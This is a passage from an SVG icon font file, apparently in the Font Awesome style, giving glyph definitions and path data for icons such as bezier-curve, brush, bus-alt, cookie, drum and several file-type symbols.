d="M576 384c35.3496 0 64 -28.6504 64 -64v-256c0 -35.3496 -28.6504 -64 -64 -64h-370.75c-16.9697 0 -33.25 6.75 -45.25 18.75l-150.63 150.63c-12.5 12.4902 -12.5 32.75 0 45.25l150.63 150.62c10.3438 10.3496 30.6143 18.75 45.2471 18.75h0.0126953h370.74z
M491.31 129.94l-62.0596 62.0596l62.0596 62.0596c6.25 6.25 6.25 16.3809 0 22.6309l-22.6191 22.6191c-6.25 6.25 -16.3809 6.25 -22.6309 0l-62.0596 -62.0596l-62.0596 62.0596c-6.25 6.25 -16.3809 6.25 -22.6309 0l-22.6191 -22.6191
c-6.25 -6.25 -6.25 -16.3809 0 -22.6309l62.0596 -62.0596l-62.0596 -62.0596c-6.25 -6.25 -6.25 -16.3809 0 -22.6309l22.6191 -22.6191c6.25 -6.25 16.3809 -6.25 22.6309 0l62.0596 62.0596l62.0596 -62.0596c6.25 -6.25 16.3809 -6.25 22.6309 0l22.6191 22.6191
c6.25 6.25 6.25 16.3809 0 22.6309z" />
    <glyph glyph-name="bezier-curve" unicode="&#xf55b;" horiz-adv-x="640" 
d="M368 416c17.6699 0 32 -14.3301 32 -32v-96c0 -17.6699 -14.3301 -32 -32 -32h-96c-17.6699 0 -32 14.3301 -32 32v96c0 17.6699 14.3301 32 32 32h96zM208 360v-72c0 -9.4502 2.17969 -18.3604 5.87988 -26.4404c-34.2695 -24.3496 -59.7402 -59.9492 -71.04 -101.56
h-49.3994c13.6797 64.6797 54.1699 119.48 109.54 152h-79.7305c-9.5 -23.4404 -32.4102 -40 -59.25 -40c-35.3398 0 -64 28.6504 -64 64s28.6602 64 64 64c26.8398 0 49.75 -16.5596 59.25 -40h84.75zM160 128c17.6699 0 32 -14.3301 32 -32v-96
c0 -17.6699 -14.3301 -32 -32 -32h-96c-17.6699 0 -32 14.3301 -32 32v96c0 17.6699 14.3301 32 32 32h96zM576 400c35.3398 0 64 -28.6504 64 -64s-28.6602 -64 -64 -64c-26.8398 0 -49.75 16.5596 -59.25 40h-79.7305c55.3701 -32.5195 95.8604 -87.3203 109.54 -152
h-49.3994c-11.2998 41.6104 -36.7705 77.21 -71.04 101.56c3.68945 8.08008 5.87988 16.9902 5.87988 26.4404v72h84.75c9.5 23.4404 32.4102 40 59.25 40zM576 128c17.6699 0 32 -14.3301 32 -32v-96c0 -17.6699 -14.3301 -32 -32 -32h-96c-17.6699 0 -32 14.3301 -32 32
v96c0 17.6699 14.3301 32 32 32h96z" />
    <glyph glyph-name="bong" unicode="&#xf55c;" horiz-adv-x="447" 
d="M302.5 -64h-221c-23.1699 0 -44.4199 12.5801 -56 32.6602c-16.1904 28.0703 -25.5 60.5898 -25.5 95.3398c0 71.0303 38.6699 132.9 96 166.11v153.93l-15.9697 -0.0205078c-8.85059 -0.00976562 -16.0303 7.16016 -16.0205 16.0107l0.0400391 31.7295
c0.00976562 8.82031 7.16016 15.9707 15.9805 15.9805l223.939 0.259766c8.85059 0.00976562 16.0303 -7.16992 16.0205 -16.0195l-0.0400391 -31.7207c-0.00976562 -8.81934 -7.16016 -15.9697 -15.9805 -15.9795l-15.9697 -0.0205078v-154.16
c14.1201 -8.17969 27.0898 -18.1396 38.6504 -29.5098l39.4092 39.4102l-9.37988 9.37988c-6.25 6.25 -6.25 16.3799 0 22.6299l11.3105 11.3105c6.25 6.25 16.3799 6.25 22.6299 0l52.6895 -52.6904c6.25 -6.25 6.25 -16.3799 0 -22.6299l-11.2998 -11.3203
c-6.25 -6.25 -16.3799 -6.25 -22.6299 0l-9.37988 9.37988l-43.4404 -43.4395c17.3604 -28.8105 27.4404 -62.5 27.4404 -98.6201c0 -34.75 -9.30957 -67.2598 -25.5 -95.3398c-11.5703 -20.0801 -32.8203 -32.6602 -56 -32.6602zM120.06 188.57
c-24.8096 -14.3701 -44.1094 -35.7305 -56.5596 -60.5703h257c-12.4404 24.8398 -31.75 46.2002 -56.5596 60.5703l-23.9404 13.8701v181.76l-96 -0.110352v-181.649z" />
    <glyph glyph-name="brush" unicode="&#xf55d;" horiz-adv-x="384" 
d="M352 448c17.6699 0 32 -14.3301 32 -32v-224h-384v224c0 17.6699 14.3301 32 32 32h320zM0 128v32h384v-32c0 -35.3496 -28.6602 -64 -64 -64h-64v-64c0 -35.3496 -28.6602 -64 -64 -64s-64 28.6504 -64 64v64h-64c-35.3398 0 -64 28.6504 -64 64zM192 24
c-13.25 0 -24 -10.7402 -24 -24c0 -13.25 10.75 -24 24 -24s24 10.75 24 24c0 13.2598 -10.75 24 -24 24z" />
    <glyph glyph-name="bus-alt" unicode="&#xf55e;" 
d="M488 320c13.25 0 24 -10.7402 24 -24v-80c0 -13.25 -10.75 -24 -24 -24h-8v-166.4c0 -12.7998 -9.59961 -25.5996 -25.5996 -25.5996h-6.40039v-32c0 -17.6699 -14.3301 -32 -32 -32h-32c-17.6699 0 -32 14.3301 -32 32v32h-192v-32c0 -17.6699 -14.3301 -32 -32 -32h-32
c-17.6699 0 -32 14.3301 -32 32v32c-17.6699 0 -32 14.3301 -32 32v160h-8c-13.25 0 -24 10.75 -24 24v80c0 13.2598 10.75 24 24 24h8v48c0 44.7998 99.2002 80 224 80s224 -35.2002 224 -80v-48h8zM160 376v-16c0 -4.41992 3.58008 -8 8 -8h176c4.41992 0 8 3.58008 8 8
v16c0 4.41992 -3.58008 8 -8 8h-176c-4.41992 0 -8 -3.58008 -8 -8zM112 48c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM240 160v160h-112c-17.6699 0 -32 -14.3301 -32 -32v-96c0 -17.6699 14.3301 -32 32 -32h112zM272 160
h112c17.6699 0 32 14.3301 32 32v96c0 17.6699 -14.3301 32 -32 32h-112v-160zM400 48c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32z" />
    <glyph glyph-name="cannabis" unicode="&#xf55f;" 
d="M503.47 87.75c5.24023 -2.75977 8.52051 -8.20996 8.53027 -14.1504c0.00976562 -5.92969 -3.26953 -11.3691 -8.50977 -14.1494c-2.4502 -1.29004 -60.7705 -31.7197 -133.49 -31.7197c-6.12988 0 -11.96 0.0996094 -17.5 0.30957
c11.3604 -22.2305 16.5195 -38.3096 16.8096 -39.2197c1.80078 -5.68066 0.290039 -11.8906 -3.90918 -16.1104c-2.5918 -2.60059 -7.67578 -4.71094 -11.3467 -4.71094c-1.34277 0 -3.47168 0.322266 -4.75391 0.720703c-1.83008 0.580078 -37.7197 11.9902 -77.2998 39.29
v-64.0098c0 -4.41992 -3.58008 -8 -8 -8h-16c-4.41992 0 -8 3.58008 -8 8v64.0195c-39.5801 -27.2998 -75.4697 -38.7197 -77.2998 -39.2891c-1.28223 -0.398438 -3.41113 -0.72168 -4.75391 -0.72168c-3.6709 0 -8.75488 2.11035 -11.3467 4.71094
c-4.19922 4.2207 -5.70996 10.4307 -3.90918 16.1104c0.290039 0.910156 5.43945 16.9902 16.8096 39.2197c-5.54004 -0.209961 -11.3604 -0.30957 -17.5 -0.30957c-72.7305 0 -131.04 30.4297 -133.49 31.7197c-4.69629 2.48926 -8.50879 8.82422 -8.50879 14.1396
c0 5.32422 3.82129 11.6641 8.5293 14.1504c1.56934 0.820312 32.3896 16.8896 76.7793 25.8096c-64.25 75.1201 -84.0498 161.671 -84.9297 165.641c-0.210938 0.947266 -0.382812 2.50488 -0.382812 3.47559c0 3.65039 2.09375 8.71094 4.67285 11.2939
c3.03027 3.04004 7.12012 4.7002 11.3203 4.7002c1.14941 0 2.2998 -0.129883 3.43945 -0.379883c3.89062 -0.860352 86.5508 -19.5996 160.58 -79.7598c0 1.45996 -0.00976562 2.92969 -0.00976562 4.39941c0 118.79 59.9805 213.721 62.5303 217.7
c2.93945 4.58984 8.01953 7.37012 13.4697 7.37012h0.00195312c4.82812 0 10.8574 -3.30176 13.458 -7.37012c2.5498 -3.97949 62.5303 -98.9102 62.5303 -217.7c0 -1.46973 0 -2.93945 -0.00976562 -4.39941c74.0391 60.1699 156.699 78.9102 160.579 79.7598
c1.15039 0.259766 2.30078 0.379883 3.44043 0.379883c4.2002 0 8.29004 -1.66016 11.3203 -4.7002c3.85938 -3.87012 5.47949 -9.43945 4.2998 -14.7695c-0.879883 -3.96973 -20.6797 -90.5205 -84.9297 -165.641c44.3896 -8.91992 75.2197 -24.9893 76.7793 -25.8096z" />
    <glyph glyph-name="check-double" unicode="&#xf560;" 
d="M504.5 276.05c10 -10.0596 10 -26.3594 0 -36.4199l-294.4 -296.09c-9.98926 -10.0596 -26.1992 -10.0596 -36.1992 0l-166.4 167.36c-10 10.0498 -10 26.3594 0 36.4092l36.2002 36.4102c9.99023 10.0605 26.2002 10.0605 36.2002 0l112.1 -112.739l240.1 241.479
c9.99023 10.0498 26.2002 10.0498 36.2002 0zM166.57 165.29l-122.601 123.5c-6.83984 7.01953 -6.83984 18.3604 0.180664 25.2002l42.1299 41.7695c7.01953 6.83984 18.3594 6.83984 25.2002 -0.179688l68.2295 -68.7705l157.16 156.08
c7.03027 6.84082 18.3701 6.84082 25.21 -0.179688l41.9502 -42.1201c6.83984 -7.03027 6.83984 -18.3701 -0.180664 -25.21l-212.069 -210.27c-7.03027 -6.84082 -18.3701 -6.84082 -25.21 0.179688z" />
    <glyph glyph-name="cocktail" unicode="&#xf561;" horiz-adv-x="576" 
d="M296 -16c22.0898 0 40 -17.9102 40 -40c0 -4.41992 -3.58008 -8 -8 -8h-240c-4.41992 0 -8 3.58008 -8 8c0 22.0898 17.9102 40 40 40h56v125.22l-168.74 168.73c-15.5195 15.5195 -4.5293 42.0498 17.4199 42.0498h366.641c21.9492 0 32.9395 -26.5303 17.4199 -42.0498
l-168.74 -168.73v-125.22h56zM432 448c79.5303 0 144 -64.4697 144 -144s-64.4697 -144 -144 -144c-27.4102 0 -52.7695 8.08008 -74.5801 21.3799l35.2598 35.2598c12.0303 -5.43945 25.2803 -8.63965 39.3203 -8.63965c52.9297 0 96 43.0596 96 96s-43.0703 96 -96 96
c-35.3701 0 -65.9902 -19.4502 -82.6396 -48h-52.54c19.8301 55.7998 72.5693 96 135.18 96z" />
    <glyph glyph-name="concierge-bell" unicode="&#xf562;" 
d="M288 317.46c108.51 -15.5703 192 -108.64 192 -221.46h-448c0 112.82 83.4902 205.89 192 221.46v18.54h-16c-8.83984 0 -16 7.16016 -16 16v16c0 8.83984 7.16016 16 16 16h96c8.83984 0 16 -7.16016 16 -16v-16c0 -8.83984 -7.16016 -16 -16 -16h-16v-18.54zM496 64
c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-480c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h480z" />
    <glyph glyph-name="cookie" unicode="&#xf563;" 
d="M510.37 193.21c4.37988 -27.6602 -0.110352 -56 -12.8203 -80.96l-35.0996 -68.8701c-10.7695 -21.1328 -36.6592 -47.0273 -57.79 -57.7998l-69.1201 -35.21c-24.8301 -12.6396 -53.0098 -17.1104 -80.5205 -12.75l-76.6992 12.1396
c-23.3896 3.70801 -55.9639 20.3066 -72.71 37.0498l-54.7607 54.75c-16.7959 16.8027 -33.4443 49.4844 -37.1592 72.9502l-12.0801 76.2705c-0.901367 5.68848 -1.63281 14.9805 -1.63281 20.7412c0 17.5723 6.47461 44.541 14.4521 60.1982l35.1006 68.8799
c10.7666 21.1357 36.6562 47.0303 57.79 57.8008l69.1201 35.21c24.8291 12.6494 53.0098 17.1201 80.5195 12.7598l76.7002 -12.1504c27.5303 -4.34961 52.9795 -17.3301 72.71 -37.0498l54.7598 -54.75c16.7969 -16.8027 33.4443 -49.4844 37.1602 -72.9502zM176 80
c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM208 240c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM368 112c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32
s-32 -14.3301 -32 -32s14.3301 -32 32 -32z" />
    <glyph glyph-name="cookie-bite" unicode="&#xf564;" 
d="M510.52 192.18c4.10059 -27.3301 -0.349609 -55.2695 -12.9092 -79.9102l-35.1006 -68.8799c-10.7656 -21.1367 -36.6562 -47.0361 -57.79 -57.8096l-69.1299 -35.21c-24.8301 -12.6504 -53.0195 -17.1201 -80.5303 -12.7598l-76.71 12.1494
c-23.3916 3.70801 -55.9658 20.3105 -72.71 37.0605l-54.7695 54.7598c-16.7969 16.8057 -33.4443 49.4912 -37.1602 72.96l-12.0801 76.2695c-0.900391 5.68945 -1.63184 14.9824 -1.63184 20.7422c0 17.5752 6.47461 44.5479 14.4521 60.208l35.0996 68.8799
c10.7646 21.1396 36.6543 47.0391 57.79 57.8105l69.1299 35.2197c24.5898 12.5205 52.46 16.96 79.7207 12.8203c0.859375 -69.96 57.6895 -126.45 127.859 -126.45c0 -70.1699 56.5 -127.01 126.47 -127.86zM176 80c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32
s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM208 240c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM368 112c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32z" />
    <glyph glyph-name="crop-alt" unicode="&#xf565;" 
d="M488 96c13.25 0 24 -10.7402 24 -24v-48c0 -13.25 -10.75 -24 -24 -24h-40v-40c0 -13.25 -10.75 -24 -24 -24h-48c-13.25 0 -24 10.75 -24 24v328h-160v96h224c17.6699 0 32 -14.3301 32 -32v-256h40zM160 424v-328h160v-96h-224c-17.6699 0 -32 14.3301 -32 32v256h-40
c-13.25 0 -24 10.75 -24 24v48c0 13.2598 10.75 24 24 24h40v40c0 13.2598 10.75 24 24 24h48c13.25 0 24 -10.7402 24 -24z" />
    <glyph glyph-name="digital-tachograph" unicode="&#xf566;" horiz-adv-x="640" 
d="M608 352c17.6699 0 32 -14.3301 32 -32v-256c0 -17.6699 -14.3301 -32 -32 -32h-576c-17.6699 0 -32 14.3301 -32 32v256c0 17.6699 14.3301 32 32 32h576zM304 96v8c0 4.41992 -3.58008 8 -8 8h-224c-4.41992 0 -8 -3.58008 -8 -8v-8c0 -4.41992 3.58008 -8 8 -8h224
c4.41992 0 8 3.58008 8 8zM72 160c0 -4.41992 3.58008 -8 8 -8h16c4.41992 0 8 3.58008 8 8v16c0 4.41992 -3.58008 8 -8 8h-16c-4.41992 0 -8 -3.58008 -8 -8v-16zM136 160c0 -4.41992 3.58008 -8 8 -8h16c4.41992 0 8 3.58008 8 8v16c0 4.41992 -3.58008 8 -8 8h-16
c-4.41992 0 -8 -3.58008 -8 -8v-16zM200 160c0 -4.41992 3.58008 -8 8 -8h16c4.41992 0 8 3.58008 8 8v16c0 4.41992 -3.58008 8 -8 8h-16c-4.41992 0 -8 -3.58008 -8 -8v-16zM264 160c0 -4.41992 3.58008 -8 8 -8h16c4.41992 0 8 3.58008 8 8v16c0 4.41992 -3.58008 8 -8 8
h-16c-4.41992 0 -8 -3.58008 -8 -8v-16zM304 224v48c0 8.83984 -7.16016 16 -16 16h-208c-8.83984 0 -16 -7.16016 -16 -16v-48c0 -8.83984 7.16016 -16 16 -16h208c8.83984 0 16 7.16016 16 16zM576 96v8c0 4.41992 -3.58008 8 -8 8h-224c-4.41992 0 -8 -3.58008 -8 -8v-8
c0 -4.41992 3.58008 -8 8 -8h224c4.41992 0 8 3.58008 8 8z" />
    <glyph glyph-name="dizzy" unicode="&#xf567;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM152 233.4l28.7002 -28.7002c14.7002 -14.7998 37.7998 7.39941 22.5996 22.5996l-28.7002 28.7002l28.7002 28.7002c15 14.8994 -7.59961 37.5996 -22.5996 22.5996
l-28.7002 -28.7002l-28.7002 28.7002c-14.8994 15 -37.5996 -7.59961 -22.5996 -22.5996l28.7002 -28.7002l-28.7002 -28.7002c-15.2002 -15.0996 7.7998 -37.3994 22.5996 -22.5996zM248 32c35.2998 0 64 28.7002 64 64s-28.7002 64 -64 64s-64 -28.7002 -64 -64
s28.7002 -64 64 -64zM395.3 227.3l-28.7002 28.7002l28.7002 28.7002c15 14.8994 -7.59961 37.5996 -22.5996 22.5996l-28.7002 -28.7002l-28.7002 28.7002c-14.8994 15 -37.5996 -7.59961 -22.5996 -22.5996l28.7002 -28.7002l-28.7002 -28.7002
c-15.2002 -15.0996 7.7998 -37.3994 22.5996 -22.5996l28.7002 28.7002l28.7002 -28.7002c14.7002 -14.7998 37.7998 7.39941 22.5996 22.5996z" />
    <glyph glyph-name="drafting-compass" unicode="&#xf568;" horiz-adv-x="511" 
d="M457.01 103.58l54.9805 -95.2305l-7.02051 -58.25c-1.2793 -10.5898 -12.3594 -16.9893 -22.1699 -12.7998l-53.9502 23.04l-54.3799 94.1904c29.9102 11.8701 57.4902 28.7197 82.54 49.0498zM499.5 198.14c-52.6201 -83.1299 -144.45 -134.14 -243.5 -134.14
c-35.3799 0 -69.8701 6.71973 -102.06 18.96l-70.8008 -122.63l-53.9492 -23.04c-9.81055 -4.19043 -20.8906 2.20996 -22.1709 12.7998l-7.01953 58.25l71.2803 123.46c-21.29 17.8105 -40.4102 38.3799 -55.9805 62.0205
c-4.99023 7.56934 -2.20996 17.9297 5.64062 22.4697l27.75 16.0703c7.40918 4.29004 16.5898 1.76953 21.3799 -5.33008c9.71973 -14.4102 21.1299 -27.3906 33.6797 -39l68.2998 118.31c-7.43945 13.6299 -12.0498 29.0303 -12.0498 45.6602c0 53.0195 42.9805 96 96 96
s96 -42.9805 96 -96c0 -16.6299 -4.61035 -32.0303 -12.0596 -45.6602l51.79 -89.71c-23.0508 -23.1699 -51.3809 -39.96 -82.6104 -48.9199l-51.0898 88.5c-0.69043 -0.0195312 -1.33984 -0.209961 -2.04004 -0.209961s-1.33984 0.19043 -2.04004 0.209961
l-67.3604 -116.68c22.1797 -7.28027 45.4805 -11.5303 69.4102 -11.5303c76.25 0 147.01 38.8496 188.12 102.38c4.64941 7.17969 13.7803 9.87012 21.2598 5.71973l28.0703 -15.5693c7.93945 -4.40039 10.9102 -14.7207 6.0498 -22.3906zM256 384
c-17.6699 0 -32 -14.3301 -32 -32s14.3301 -32 32 -32s32 14.3301 32 32s-14.3301 32 -32 32z" />
    <glyph glyph-name="drum" unicode="&#xf569;" horiz-adv-x="576" 
d="M458.08 327.12c71.3799 -23.29 117.91 -60.75 117.92 -103.13v-160.83c0 -30.46 -24.0303 -58.4004 -64 -80.3701v96.3701c0 17.5996 -14.4004 32 -32 32s-32 -14.4004 -32 -32v-122.41c-37.4004 -11.1299 -81 -18.4404 -128 -20.75v111.16c0 17.5996 -14.4004 32 -32 32
s-32 -14.4004 -32 -32v-111.15c-47 2.31055 -90.5996 9.62012 -128 20.75v122.41c0 17.5996 -14.4004 32 -32 32s-32 -14.4004 -32 -32v-96.3701c-39.9697 21.9697 -64 49.9102 -64 80.3701v160.83c0 70.6904 128.94 128 288 128
c21.8467 -0.00585938 57.167 -2.2373 78.8398 -4.98047l160.69 96.4102c15.1699 9.10059 34.8096 4.18066 43.9102 -10.9697c9.08984 -15.1602 4.18945 -34.8203 -10.9707 -43.9102zM288 144c132.54 0 240 35.8096 240 79.9902c0 30.2695 -50.4502 56.5996 -124.82 70.1895
l-162.71 -97.6201c-14.3994 -8.63965 -34.3496 -4.95996 -43.9102 10.9707c-9.08984 15.1602 -4.18945 34.8193 10.9707 43.9102l87.4102 52.4395c-2.32031 0.0205078 -4.60059 0.120117 -6.94043 0.120117c-132.55 0 -240 -35.8203 -240 -80s107.45 -80 240 -80z" />
    <glyph glyph-name="drum-steelpan" unicode="&#xf56a;" horiz-adv-x="576" 
d="M288 416c159.06 0 288 -57.3096 288 -128v-192c0 -70.6904 -128.94 -128 -288 -128s-288 57.3096 -288 128v192c0 70.6904 128.94 128 288 128zM205.01 257.64c5.11035 19.0605 2.49023 38.96 -7.37012 56.0508l-25.5996 44.3398
c-73.9297 -13.6406 -124.04 -39.8701 -124.04 -70.0303c0 -30.7803 52.2305 -57.46 128.7 -70.8398c13.7695 9.91016 23.8594 23.8701 28.3096 40.4795zM288 208c21.0801 0 41.4102 1 60.8896 2.7002c-8.05957 26.1299 -32.1494 45.2998 -60.8896 45.2998
s-52.8301 -19.1699 -60.8896 -45.2998c19.4795 -1.7002 39.8096 -2.7002 60.8896 -2.7002zM352 352v13.04c-20.4004 1.87988 -41.7998 2.95996 -64 2.95996s-43.5996 -1.08008 -64 -2.95996v-13.04c0 -35.29 28.71 -64 64 -64s64 28.71 64 64zM398.93 217.1
c76.6699 13.3604 129.07 40.0703 129.07 70.9004c0 30.21 -50.2803 56.5 -124.44 70.0996l-25.6494 -44.4199c-9.87012 -17.0801 -12.4902 -36.9795 -7.37988 -56.04c4.45996 -16.6396 14.5898 -30.6299 28.3994 -40.54z" />
    <glyph glyph-name="feather-alt" unicode="&#xf56b;" 
d="M512 448c-1.80957 -26.2598 -11.71 -132.86 -53.6201 -234.79l-106.54 -53.21h81.1406c-9.08008 -16.4102 -19.2002 -32.2305 -30.4502 -47.1201l-146.79 -48.8799h100.95c-35.5605 -30.0703 -79.1006 -51.0996 -132.58 -56.54
c-41.8105 -4.83008 -83.8701 -7.21973 -125.96 -7.36035l-57.1309 -57.0693c-9.38965 -9.37012 -24.5996 -9.37012 -33.9795 0s-9.37988 24.5693 0 33.9395l259.5 259.24c6.25 6.25 6.25 16.3799 0 22.6299s-16.4004 6.25 -22.6504 0l-178.87 -178.689
c1.15039 26.7998 2.90039 53.5801 5.99023 80.2393c25.4307 249.41 389.21 284.051 440.99 287.61z" />
    <glyph glyph-name="file-contract" unicode="&#xf56c;" horiz-adv-x="384" 
d="M224 312c0 -13.2002 10.7998 -24 24 -24h136v-328c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v464c0 13.2998 10.7002 24 24 24h200v-136zM64 376v-16c0 -4.41992 3.58008 -8 8 -8h80c4.41992 0 8 3.58008 8 8v16c0 4.41992 -3.58008 8 -8 8
h-80c-4.41992 0 -8 -3.58008 -8 -8zM64 312v-16c0 -4.41992 3.58008 -8 8 -8h80c4.41992 0 8 3.58008 8 8v16c0 4.41992 -3.58008 8 -8 8h-80c-4.41992 0 -8 -3.58008 -8 -8zM256.81 64c-4.19922 0 -8.13965 2.44043 -10.1592 6.5
c-11.9502 23.8604 -46.2305 30.3496 -66 14.1602l-13.8809 41.6396c-3.28906 9.82031 -12.4297 16.4102 -22.7695 16.4102s-19.4805 -6.59961 -22.7803 -16.4102l-18.1895 -54.6396c-1.53027 -4.58008 -5.81055 -7.66016 -10.6406 -7.66016h-12.3896
c-8.83984 0 -16 -7.16016 -16 -16s7.16016 -16 16 -16h12.3896c18.6201 0 35.1104 11.8701 41 29.5303l10.6104 31.8799l16.8301 -50.46c2.03027 -6.14062 7.58008 -10.4404 14.0303 -10.8906c0.389648 -0.0292969 0.759766 -0.0498047 1.13965 -0.0498047h0.00976562
c5.45508 0 11.8613 3.96094 14.2998 8.83984l7.6709 15.3408c2.7998 5.59961 7.93945 6.18945 10.0195 6.18945s7.21973 -0.599609 10.1699 -6.51953c7.37012 -14.7207 22.1904 -23.8604 38.6396 -23.8604h47.1904c8.83984 0 16 7.16016 16 16s-7.16016 16 -16 16h-47.1904z
M377 343c4.5 -4.5 7 -10.5996 7 -16.9004v-6.09961h-128v128h6.09961c6.40039 0 12.5 -2.5 17 -7z" />
    <glyph glyph-name="file-download" unicode="&#xf56d;" horiz-adv-x="384" 
d="M224 312c0 -13.2002 10.7998 -24 24 -24h136v-328c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v464c0 13.2998 10.7002 24 24 24h200v-136zM300.45 100.64c10.1299 10.0703 3.00977 27.3604 -11.2705 27.3604h-65.1797v80
c0 8.83984 -7.16016 16 -16 16h-32c-8.83984 0 -16 -7.16016 -16 -16v-80h-65.1797c-14.2803 0 -21.4004 -17.29 -11.25 -27.3604l96.4199 -95.6992c6.64941 -6.61035 17.3896 -6.61035 24.04 0zM377 343c4.5 -4.5 7 -10.5996 7 -16.9004v-6.09961h-128v128h6.09961
c6.40039 0 12.5 -2.5 17 -7z" />
    <glyph glyph-name="file-export" unicode="&#xf56e;" horiz-adv-x="575" 
d="M384 326.1v-6.09961h-128v128h6.09961c6.40039 0 12.5 -2.5 17 -7l97.9004 -98c4.5 -4.5 7 -10.5996 7 -16.9004zM571 140c6.59961 -6.59961 6.59961 -17.4004 0 -24l-95.7002 -96.5c-10.0996 -10.0996 -27.3994 -3 -27.3994 11.2998v65.2002h-64v64h64v65.0996
c0 14.3008 17.2998 21.4004 27.3994 11.3008zM192 112c0 -8.7998 7.2002 -16 16 -16h176v-136c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v464c0 13.2998 10.7002 24 24 24h200v-136c0 -13.2002 10.7998 -24 24 -24h136v-128h-176
c-8.7998 0 -16 -7.2002 -16 -16v-32z" />
    <glyph glyph-name="file-import" unicode="&#xf56f;" 
d="M16 160h112v-64h-112c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16zM505 343c4.5 -4.5 7 -10.5996 7 -16.9004v-6.09961h-128v128h6.09961c6.40039 0 12.5 -2.5 17 -7zM352 312c0 -13.2002 10.7998 -24 24 -24h136v-328c0 -13.2998 -10.7002 -24 -24 -24
h-336c-13.2998 0 -24 10.7002 -24 24v136h127.9v-65.0996c0 -14.3008 17.2998 -21.4004 27.3994 -11.3008l95.7002 96.4004c6.59961 6.59961 6.59961 17.2998 0 24l-95.5996 96.5c-10.1006 10.0996 -27.4004 3 -27.4004 -11.2998v-65.2002h-128v264
c0 13.2998 10.7002 24 24 24h200v-136z" />
    <glyph glyph-name="file-invoice" unicode="&#xf570;" horiz-adv-x="384" 
d="M288 192v-64h-192v64h192zM377 343c4.5 -4.5 7 -10.5996 7 -16.9004v-6.09961h-128v128h6.09961c6.40039 0 12.5 -2.5 17 -7zM224 312c0 -13.2002 10.7998 -24 24 -24h136v-328c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v464
c0 13.2998 10.7002 24 24 24h200v-136zM64 376v-16c0 -4.41992 3.58008 -8 8 -8h80c4.41992 0 8 3.58008 8 8v16c0 4.41992 -3.58008 8 -8 8h-80c-4.41992 0 -8 -3.58008 -8 -8zM64 312v-16c0 -4.41992 3.58008 -8 8 -8h80c4.41992 0 8 3.58008 8 8v16
c0 4.41992 -3.58008 8 -8 8h-80c-4.41992 0 -8 -3.58008 -8 -8zM320 8v16c0 4.41992 -3.58008 8 -8 8h-80c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h80c4.41992 0 8 3.58008 8 8zM320 208c0 8.83984 -7.16016 16 -16 16h-224
c-8.83984 0 -16 -7.16016 -16 -16v-96c0 -8.83984 7.16016 -16 16 -16h224c8.83984 0 16 7.16016 16 16v96z" />
    <glyph glyph-name="file-invoice-dollar" unicode="&#xf571;" horiz-adv-x="384" 
d="M377 343c4.5 -4.5 7 -10.5996 7 -16.9004v-6.09961h-128v128h6.09961c6.40039 0 12.5 -2.5 17 -7zM224 312c0 -13.2002 10.7998 -24 24 -24h136v-328c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v464c0 13.2998 10.7002 24 24 24h200v-136z
M64 376v-16c0 -4.41992 3.58008 -8 8 -8h80c4.41992 0 8 3.58008 8 8v16c0 4.41992 -3.58008 8 -8 8h-80c-4.41992 0 -8 -3.58008 -8 -8zM64 296c0 -4.41992 3.58008 -8 8 -8h80c4.41992 0 8 3.58008 8 8v16c0 4.41992 -3.58008 8 -8 8h-80c-4.41992 0 -8 -3.58008 -8 -8
v-16zM208 32.1201c23.6201 0.629883 42.6699 20.54 42.6699 45.0703c0 19.9697 -12.9902 37.8096 -31.5801 43.3896l-45 13.5c-5.16016 1.54004 -8.76953 6.78027 -8.76953 12.7295c0 7.27051 5.2998 13.1904 11.7998 13.1904h28.1104
c4.55957 0 8.94922 -1.29004 12.8193 -3.71973c3.24023 -2.03027 7.36035 -1.91016 10.1299 0.729492l11.75 11.21c3.53027 3.37012 3.33008 9.20996 -0.569336 12.1406c-9.10059 6.83984 -20.0801 10.7695 -31.3701 11.3496v24.29c0 4.41992 -3.58008 8 -8 8h-16
c-4.41992 0 -8 -3.58008 -8 -8v-24.1201c-23.6201 -0.629883 -42.6699 -20.5498 -42.6699 -45.0703c0 -19.9697 12.9893 -37.8096 31.5801 -43.3896l45 -13.5c5.15918 -1.54004 8.76953 -6.78027 8.76953 -12.7295c0 -7.27051 -5.2998 -13.1904 -11.7998 -13.1904h-28.1104
c-4.55957 0 -8.9502 1.2998 -12.8193 3.71973c-3.24023 2.03027 -7.36035 1.91016 -10.1309 -0.729492l-11.75 -11.21c-3.5293 -3.37012 -3.3291 -9.20996 0.570312 -12.1406c9.10059 -6.83008 20.0801 -10.7695 31.3701 -11.3496v-24.29c0 -4.41992 3.58008 -8 8 -8h16
c4.41992 0 8 3.58008 8 8v24.1201z" />
    <glyph glyph-name="file-prescription" unicode="&#xf572;" horiz-adv-x="384" 
